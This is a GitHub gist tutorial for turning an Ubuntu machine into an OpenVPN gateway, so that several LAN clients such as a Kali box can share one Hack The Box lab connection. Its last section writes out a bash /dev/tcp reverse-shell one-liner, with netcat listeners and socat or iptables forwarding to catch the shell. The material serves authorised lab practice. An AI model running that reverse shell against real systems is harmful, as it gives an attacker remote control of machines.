Skip to content

Instantly share code, notes, and snippets.

@faisalfs10x

faisalfs10x/vpn-gateway.md

Created May 15, 2023 13:45
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save faisalfs10x/9f72fb18e60bd631036097de934f9ee4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save faisalfs10x/9f72fb18e60bd631036097de934f9ee4 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. faisalfs10x created this gist May 15, 2023.
    132 changes: 132 additions & 0 deletions vpn-gateway.md
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,132 @@
    #### Set up an HTB (Hack The Box) OpenVPN client in Ubuntu 18 to act as a VPN gateway and forward traffic from your LAN, which includes a Kali machine, to the internal network of HTB.

    ---

    - Problem: OpenVPN allow single connection concurrently to connect to the HTB lab. Hence, we can't distribute the OpenVPN config file to others as it will kick out the previously connected user.
    - What to expect: Able to share connection with multiple clients within the same network to HTB lab via Ubuntu server as VPN gateway.
    - Issue to expect: 1) Could not establish reverse shell directly to Kali machine.
    - Workaround: 1) Use port forwarder eg, use socat or iptables in Ubuntu gateway and forward to Kali machine
    ---

    ![image](https://user-images.githubusercontent.com/51811615/238352314-b44d2495-90fb-4cca-8eb9-88ad4afdec56.png)

    #### 1) Update & install openvpn.
    ```
    ubuntu> sudo apt update -y && sudo apt install openvpn -y
    ```

    #### 2) Copy the OpenVPN configuration file to the /etc/openvpn/ directory.
    ```
    ubuntu> sudo cp /path/to/your/htb.ovpn /etc/openvpn/
    ```

    #### 3) Edit the OpenVPN configuration file to enable traffic forwarding. Find redirect-gateway and remove the # at the beginning to uncomment it.
    ```
    ubuntu> sudo nano /etc/openvpn/htb.ovpn
    ```

    #### 4) Enable IP forwarding in Ubuntu. Uncomment the line `net.ipv4.ip_forward=1` by removing the # at the beginning. Then, apply it.
    ```
    ubuntu> sudo nano /etc/sysctl.conf
    # uncomment the line `net.ipv4.ip_forward=1`
    ubuntu> sudo sysctl -p
    ```

    #### 5) Start the OpenVPN service using the HTB configuration file.
    ```
    ubuntu> sudo openvpn --config /etc/openvpn/htb.ovpn --daemon
    ```

    #### 6) Configure routing and NAT on the Ubuntu machine.
    ```
    ubuntu> sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE # rule 1
    ubuntu> sudo iptables -A FORWARD -i tun0 -o ens33 -m state --state RELATED,ESTABLISHED -j ACCEPT # rule 2
    ubuntu> sudo iptables -A FORWARD -i ens33 -o tun0 -j ACCEPT # rule 3
    ```

    ###### *rule 1 - adds a rule to the NAT table for outgoing packets (-o tun0), the source IP address should be replaced with the IP address of the interface tun0 using the MASQUERADE target (-j MASQUERADE).
    ###### *rule 2 - adds a rule to the FORWARD chain allows forwarding of packets from the tun0 interface (-i tun0) to the ens33 interface (-o ens33) if the packets are part of an established or related connection (-m state --state RELATED,ESTABLISHED).
    ###### *rule 3 - add rule to the FORWARD chain allows forwarding of packets from the ens33 interface (-i ens33) to the tun0 interface (-o tun0) without any restrictions.


    #### 7) Make the IP forwarding and iptables rules persistent.
    ```
    ubuntu> sudo apt install iptables-persistent
    ubuntu> sudo reboot
    ```

    ###### After rebooting, the Ubuntu machine should act as a VPN gateway, forwarding traffic from LAN to the internal network of HTB lab via the OpenVPN connection (tun0).
    ###### Make sure the Kali machine is connected to the LAN and has access to the internet.

    #### 8) Configure a static route in clients eg Kali machine for the HTB lab network `192.168.200.0/24` with the next hop gateway IP address Ubuntu machine (`192.168.8.220`) as its default gateway. If you have any additional network later, just repeat this step.
    ```
    kali> sudo ip route add 192.168.200.0/24 via 192.168.8.220
    ```

    #### 9) Verify if the routing information works. You should see the routing table updated with third entry. Please note that the actual output of the route -n command may vary depending on your specific network configuration.
    ```
    kali> route -n
    Kernel IP routing table
    Destination Gateway Genmask Flags Metric Ref Use Iface
    0.0.0.0 192.168.8.1 0.0.0.0 UG 0 0 0 eth0
    192.168.8.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
    192.168.200.0 192.168.8.220 255.255.255.0 UG 0 0 0 eth0
    ```

    #### 10) Try pinging a host within the HTB network.
    ```
    kali> ping <HTB_target>
    ```

    ###### * You can also check the OpenVPN logs on the Ubuntu machine (`/var/log/openvpn.log`) for any errors or connection issues, or just `sudo grep -i vpn /var/log/syslog`

    ---

    - Issue to expect: Could not establish reverse shell directly to Kali machine.
    - Workaround: Use port forwarder eg, use socat or iptables in Ubuntu gateway and forward to Kali machine

    ### For receiving incoming port:

    #### Method 1 using socat.
    ###### Use socat to forward any TCP incoming port to the Kali machine. Socat will listen on <local_port> on the Ubuntu machine, and any incoming traffic will be forwarded to <Kali_machine_IP>:<Kali_port>. Make sure the necessary firewall rules are in place to allow incoming connections on <local_port>.

    #### 1) Listen in Kali
    ```
    kali> nc -lvp 9999
    ```
    #### 2) Setup socat in Ubuntu gateway to forward traffic to Kali machine
    ```
    ubuntu> socat TCP-LISTEN:9999,fork TCP:<Kali_machine_IP>:9999 & # append '&' to run in the background
    ```
    #### 3) Setup reverse shell to Ubuntu gateway
    ```
    HTB_target> bash -i >& /dev/tcp/<Ubuntu_gateway>/9999 0>&1
    ```

    #### Method 2 using iptables.
    ###### Considering we are in trusted LAN, to forward any port from the range of 8000 to 9000 to the LAN network (192.168.21.0/24) to receive a reverse shell, you can use the following steps:

    #### 1) Configure iptables rules. Assuming client machines in LAN are assigned with 192.168.21.0/24.
    ###### * This is not OPSEC safe as we are forwarding traffic to entire subnet. Anyone listening could capture the connection. For better OPSEC, please specify IP of Kali machine.
    ```
    ubuntu> sudo iptables -t nat -A PREROUTING -p tcp --dport 8000:9000 -j DNAT --to-destination 192.168.21.0:8000-9000
    ubuntu> sudo iptables -t nat -A POSTROUTING -d 192.168.21.0/24 -p tcp --dport 8000:9000 -j MASQUERADE
    ubuntu> sudo iptables -A FORWARD -d 192.168.21.0/24 -p tcp --dport 8000:9000 -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
    ```

    #### 2) Save the iptables rules to persist across reboots
    ```
    ubuntu> sudo sh -c "iptables-save > /etc/iptables/rules.v4"
    ```

    ###### To establish a reverse shell connection to Kali:
    ```
    kali> nc -lvp 8888
    HTB_target> bash -i >& /dev/tcp/<Ubuntu_gateway>/8888 0>&1
    ```

    ---

    #### Reference:
    1) https://www.thegeekstuff.com/2011/02/iptables-add-rule/